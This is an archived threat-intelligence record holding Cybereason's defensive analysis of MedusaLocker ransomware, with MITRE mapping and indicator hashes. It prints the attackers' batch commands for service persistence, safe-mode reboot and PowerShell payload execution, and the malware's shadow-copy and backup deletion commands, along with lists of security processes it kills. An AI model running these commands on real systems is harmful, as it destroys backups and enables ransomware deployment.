{
	"id": "fb17ab41-dae6-4014-9b92-10ba257bf2f7",
	"created_at": "2026-04-06T00:06:54.212266Z",
	"updated_at": "2026-04-10T13:12:53.310343Z",
	"deleted_at": null,
	"sha1_hash": "6629c6c6e4f35664e4f3aeb65ed487a98b82c896",
	"title": "Cybereason vs. MedusaLocker Ransomware",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 1440341,
	"plain_text": "Cybereason vs. MedusaLocker Ransomware\r\nBy Cybereason Nocturnus\r\nArchived: 2026-04-05 15:15:25 UTC\r\nResearch by: Tom Fakterman and Assaf Dahan\r\nBackground\r\nThe MedusaLocker ransomware first emerged in September 2019, infecting and encrypting Windows machines around the world. There have been reports of MedusaLocker attacks across multiple industries, especially the healthcare industry, which suffered a great deal of ransomware attacks during the COVID-19 pandemic.\r\nIn order to maximize the chances of successfully encrypting the files on the compromised machine, MedusaLocker restarts the machine in safe mode before execution. This method is used to avoid security tools that might not run when the computer starts in safe mode.\r\nMedusaLocker avoids encrypting executable files, most likely to avoid rendering the targeted system unusable for paying the ransom. To make it even more dangerous, MedusaLocker uses a combination of AES and RSA-2048, making brute forcing of the encryption practically impossible.\r\nRecently, there have been reports stating that AKO, a variant of MedusaLocker, added an element of blackmail, threatening to release stolen files publicly. This method of blackmail or extortion is starting to gain popularity in the ransomware market, as reported by Cybereason earlier this year.\r\nAlthough data leak extortion threats have been found in some of MedusaLocker’s ransom notes, Cybereason did not observe evidence of information actually being exfiltrated by the MedusaLocker ransomware at the time of this research.\r\nCybereason Blocks MedusaLocker Ransomware\r\nKey Points\r\n1. High Severity: The Cybereason Nocturnus Team assesses the threat level as HIGH given the destructive potential of the attack.\r\n2. Encrypting mapped drives: MedusaLocker encrypts shared network drives of adjacent machines on the network.\r\n3. Attempted extortion: The ransom note left by new MedusaLocker variants contains threats to publicly reveal stolen data if payments are not made.\r\n4. Detected and Prevented: Cybereason’s platform fully detects and prevents the MedusaLocker ransomware.\r\nBreaking Down the Attack\r\nMany MedusaLocker infections start with two files, a ‘batch’ file and a PowerShell script saved as a ‘txt’ file:\r\nqzy.bat\r\nqzy.txt\r\nhttps://www.cybereason.com/blog/medusalocker-ransomware\r\nPage 1 of 9\r\nContents of the Batch file\r\nThe qzy.bat file deployed by the attackers is designed to create persistence via a Windows Service. The service does the following tasks:\r\n1. Executes a PowerShell script that resides in C:\\Windows\\SysWOW64\\qzy.txt, which contains the ransomware payload.\r\n2. Changes registry keys to allow the service to run in safe mode.\r\n3. Enforces a restart in safe mode.\r\n4. Restarts the infected host.\r\nsc create purebackup binpath= \"%COMSPEC% /C start /b C:\\Windows\\SysWow64\\WindowsPowerShell\\v1.0\\powershell.exe -c $km = [IO.File]::ReadAllText('C:\\Windows\\SysWOW64\\qzy.txt'); IEX $km\" start= auto DisplayName= \"purebackup\"\r\nreg add HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\BackupLP /f\r\nreg add HKLM\\System\\CurrentControlSet\\Control\\SafeBoot\\Minimal\\BackupLP /ve /d \\\"Service\\\" /f\r\nbcdedit /set {default} safeboot minimal\r\nshutdown /r /f /t 00 \u0026 del %0\r\nThe batch file execution portrayed in the Cybereason attack tree:\r\nMedusaLocker Batch file execution\r\nAfter the machine is restarted in safe mode, the created service executes and the PowerShell script runs. This PowerShell script is a PowerSploit script known as “Invoke-ReflectivePEInjection”. The script reflectively loads the MedusaLocker ransomware into the PowerShell process memory.\r\nThe MedusaLocker binary, base64-encoded in the script:\r\nPowershell script snippet\r\nMutex Detection\r\nThe first thing MedusaLocker does is check whether a mutex named “{8761ABBD-7F85-42EE-B272-A76179687C63}” already exists on the machine. If the mutex already exists, the ransomware stops its execution.\r\nCMSTP UAC Bypass / Privilege Escalation\r\nMedusaLocker uses a known UAC bypass technique, also used by other malware such as Trickbot, that allows the ransomware to run with escalated privileges and carry out administrative operations. It achieves privilege escalation by leveraging the built-in Windows tool CMSTP.exe to bypass User Account Control and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. An implementation of that technique can be found on GitHub: https://gist.github.com/hfiref0x/196af729106b780db1c73428b5a5d68d\r\nAn almost identical implementation of the above method was seen in the samples we analyzed:\r\nUAC bypass code in IDA\r\nPersistence\r\nMedusaLocker creates a copy of the malware executable in the path “%AppData%\\Roaming\\svhost.exe” or “%AppData%\\Roaming\\svchostt.exe” (depending on the malware variant), and then creates persistence via a scheduled task named “svhost” that executes every 15 minutes:\r\nScheduled task in Cybereason\r\nBypassing Security Products\r\nMedusaLocker will attempt to disable or terminate certain processes and security products:\r\nwxServer.exe,wxServerView,sqlservr.exe,sqlmangr.exe,RAgui.exe,supervise.exe,Culture.exe,RTVscan.exe,Defwatch.exe,sqlbrowser.exe,winword.exe,QB\r\nIn addition, it will attempt to disable the following services:\r\nwrapper,DefWatch,ccEvtMgr,ccSetMgr,SavRoam,sqlservr,sqlagent,sqladhlp,Culserver,RTVscan,sqlbrowser,SQLADHLP,QBIDPService,Intuit.QuickBoo\r\nusbarbitator64,vmware-converter,dbsrv12,dbeng8\r\nDeleting Backups and Preventing Recovery\r\nMedusaLocker uses the following hardcoded commands to remove backups in order to foil any recovery attempts:\r\nHardcoded commands in the malware\r\nCommand | Purpose\r\nvssadmin.exe Delete Shadows /All /Quiet | Deletes all shadow copy volumes\r\nbcdedit.exe /set {default} recoveryenabled No | Disables Automatic Startup Repair\r\nbcdedit.exe /set {default} bootstatuspolicy ignoreallfailures | Disables Windows Error Recovery on startup\r\nwbadmin DELETE SYSTEMSTATEBACKUP | Deletes the backup on Windows Server\r\nwbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest | Deletes the oldest backup on Windows Server\r\nMedusaLocker execution in the memory of powershell.exe:\r\nMedusaLocker execution from Powershell\r\nScanning and Propagating to Remote Machines\r\nAfter a successful infection, MedusaLocker scans the entire subnet in order to detect other hosts and shared folders. The ransomware edits the value “EnableLinkedConnections” of the following registry key:\r\nHKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\CurrentVersion\\Policies\\System\r\n“EnableLinkedConnections” value is changed\r\nIt does this so that it can connect to adjacent hosts residing on the same network; in addition, it pings the entire subnet to see which hosts are alive:\r\nPing sweep to find live hosts\r\nEncryption Whitelist Folders\r\nMedusaLocker avoids encrypting executable files and also takes a whitelisting approach, encrypting files in most folders with the exception of:\r\n%User Profile%\\AppData\r\n\\ProgramData\r\n\\Program Files\r\n\\Program Files (x86)\r\n\\AppData\r\n\\Application Data\r\n\\intel\r\n\\nvidia\r\n\\Users\\All Users\r\n\\Windows\r\nRansom Note\r\nAlthough the ransom note of MedusaLocker states that data has been exfiltrated, we have not observed indications of such behavior by the malware at the moment:\r\nRansom note\r\nCybereason Detection and Prevention\r\nCybereason is able to both detect and prevent the execution of MedusaLocker using the PowerShell protection component:\r\nMalicious powershell script prevented\r\nAdditionally, when the Anti-Ransomware feature is enabled, behavioral detection techniques in the platform are able to detect the deletion of the shadow copies using vssadmin.exe, which creates a Malop for the ransomware behaviour:\r\nRansomware prevented\r\nMITRE ATT\u0026CK Breakdown\r\nExecution: Windows Command Shell, PowerShell\r\nPersistence: Windows Service, Scheduled Task\r\nPrivilege Escalation: Bypass User Account Control\r\nDefense Evasion: Dynamic-link Library Injection\r\nLateral Movement: SMB/Windows Admin Shares\r\nImpact: Data Encrypted for Impact\r\nIOCs\r\nMedusaLocker Executables\r\nSHA-256\r\n4ae110bb89ddcc45bb2c4e980794195ee5eb85b5261799caedef7334f0f57cc4\r\na8b84ab6489fde1fab987df27508abd7d4b30d06ab854b5fda37a277e89a2558\r\n7593b85e66e49f39feb3141b0d390ed9c660a227042686485131f4956e1f69ff\r\nbae48fe24d140f4c1c118edbfaee4ab6446c173a0d0b849585a88db3f38f01b8\r\nd90573cdf776f60a91dc57e8c77dd61adbdaaf205de29faf26afd138c520f487\r\ned139beb506a17843c6f4b631afdf5a41ec93121da66d142b412333e628b9db8\r\nd33b09ddee82c5c439cb0c66e5c1dee9ad5259e912a3979b31c66622fb9d47ea\r\n81ca80c8275b0fdfeef2a816a7bf567f8e9a145b03ab96138c527af5c79bbec2\r\nfb07649497b39eee0a93598ff66f14a1f7625f2b6d4c30d8bb5c48de848cd4f2\r\n678069f7847f4a839724fa8574b12619443bbfbc4d65d3d04c3f9aa1ba5fb37a\r\nd74e297ac85652d1f9c43ca98ff649d7770c155556ba94cf9e665ca645aded0c\r\n104ffe0cc10413b8c3dd04fdc921f07c3cc55efba9a63ccdccf45e4012151c5f\r\nabe330ec7e157293afee2d96489165d3aa0ed9a59252ecf4f3acfa3205ca9d15\r\n40fbb2f6850213af595dd27231b06c498f87e62b50e8b883976900cc1afa75e1\r\ne70a261143213e70ffa10643e17b5890443bd2b159527cd2c408dea989a17cfc\r\n9814f9d8a8b129d745d74d3069da69aaf4187146327cb615108e9ed1b5d3c58e\r\nfd24ff7e838fea836079c4554254768abdce32c4f46148c609a5a676c9e71103\r\nfc12de55f162cd0645e6f7299f6160d1a3b4c3a665efaf4f8bd891d8139d159e\r\nf30d2204814204a2295cd5c703591e81cdfe63ee04b0e45d7ed76fe0db4a711b\r\n8b9bdc5cf5534d377a6201d1803a5aa0915b93c9df524307118fd61f361bdba2\r\nb1672fd7ef5f4419f5c74a0829645087e92437f766042bfa3325a2a96610f271\r\naae247b1fe640f2c96cbfa508d18d475f3e4c8b29fa117a31d17ba0c4e5caa48\r\nb1e97cd1ae60622ae83c56c9d15895a24405f949e4bb337e86159bcdd93e138e\r\n8597f458f1dcc5ecdf209d9c98b1f72c2fce2486236a3ae73adbe26fb6f9c671\r\ne2c2a80cb4ecc511f30d72b3487cb9023b40a25f6bbe07a92f47230fb76544f4\r\n746c79b5b6030091c37251939690eee31d023de5303544b46032bf89580806e5\r\n590ea5fa2db24715d72c276c59434b38d21678d6dcabb41f0e370f6dc56ab26b\r\n50a334ff766b053dee01ee1e410eebc5a24144517c59f9317ec47be9b70f6c48\r\nSHA1\r\ne03aedb8b9770f899a29f1939636db43825e95cf\r\nc87cd85d434e358b85f94cad098aa1f653d9cdbf\r\n1bbda98348f0d8d58c6afccd50a76321d02919f9\r\n0c1ce8017cfcc24927fff1b00606e8c83c4ebfa7\r\n6abac524387a106f73d9ddb5d8a84cb72dad1cdd\r\n02a0ea73ccc55c0236aa1b4ab590f11787e3586e\r\n212e3254099967712c6690be11ae9d65a8966ffa\r\n4bc8175c5fbe088297ec4eb3fa26acd8927530e2\r\n86d92fc3ba2b3536893b8e753da9cbae70063a50\r\n2ac4359a7db288f07ed39f696e528cb379d2d979\r\n820d3dfe29368e3f16f2818e318805d78a6b7d3d\r\n7219f91bd5fb94128159d18956e1bd9132bf10e0\r\n855b8aeb4160641ecea5710174086ee74d3e42c1\r\ne5162ede86712df1e602cbf1ca8b205ab113a931\r\na35dd292647db3cb7bf60449732fc5f12162f39e\r\n7ad1bf03b480ebd2b85b2bc5be4b9140b0ce6d4d\r\neef59fd5b71487448bfd44270d909b1441cd537b\r\n69c1527fbd840eee87821328ecf1453984ddc73e\r\n0fe01b51818c6c7c1556bffb43976a5264b3cc43\r\nf3e66237577a690ee907deac9ffbf6074a85e7a5\r\nda237c7bad052c9cb99cbab75b8bc2bdb23b3f65\r\n0bcf20885b50d64a876e7b46497b22689cb93d33\r\n78bcffb9ee6a7d29e18f66c0138aa3fd3a9225fa\r\nfc31989737dcf21b73bc0956220852dfab2cb549\r\n3e5a80fe286834f6d5f0aaf014a420ec40ebad7d\r\nf968e5c2314e198f4c0c2a4596d13ee1b6482330\r\nb209dcdfdd030ae1944507fcd9ef0eaeabe22f21\r\n9f5a9707ba0fcd5b695be131dedfdfe3b2d359d9\r\nMedusaLocker Batch\r\nSHA-256\r\n26a11fada1464069571d4114a6fe1b31ccec1c6b34bcdad649d8892348a1cf60\r\n4f5540d21d741634a4685f4ee8b9fec238a1251428d482bbded4afcc7461dc38\r\nSHA1\r\n99ef68421489ed3c5a46c6746e85b225ef554ca0\r\nMedusaLocker Powershell Loader\r\nSHA-256\r\n5d4abf7721e27760bcac238c05ade2ccc5ee4a842ad3b488462b156a26c34407\r\n7af23ee3ad9d4822c371936037ff823a719c9ab877973e32690b0dadceb55792\r\nSHA1\r\n59c5977faf16b6abe18a177aa8979a0534b4425c\r\n283714fbd1cc3e54af1049f21397a83524a2f79f\r\nSource: https://www.cybereason.com/blog/medusalocker-ransomware",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia",
		"ETDA",
		"MITRE"
	],
	"origins": [
		"web"
	],
	"references": [
		"https://www.cybereason.com/blog/medusalocker-ransomware"
	],
	"report_names": [
		"medusalocker-ransomware"
	],
	"threat_actors": [
		{
			"id": "aa73cd6a-868c-4ae4-a5b2-7cb2c5ad1e9d",
			"created_at": "2022-10-25T16:07:24.139848Z",
			"updated_at": "2026-04-10T02:00:04.878798Z",
			"deleted_at": null,
			"main_name": "Safe",
			"aliases": [],
			"source_name": "ETDA:Safe",
			"tools": [
				"DebugView",
				"LZ77",
				"OpenDoc",
				"SafeDisk",
				"TypeConfig",
				"UPXShell",
				"UsbDoc",
				"UsbExe"
			],
			"source_id": "ETDA",
			"reports": null
		}
	],
	"ts_created_at": 1775434014,
	"ts_updated_at": 1775826773,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/6629c6c6e4f35664e4f3aeb65ed487a98b82c896.pdf",
		"text": "https://archive.orkl.eu/6629c6c6e4f35664e4f3aeb65ed487a98b82c896.txt",
		"img": "https://archive.orkl.eu/6629c6c6e4f35664e4f3aeb65ed487a98b82c896.jpg"
	}
}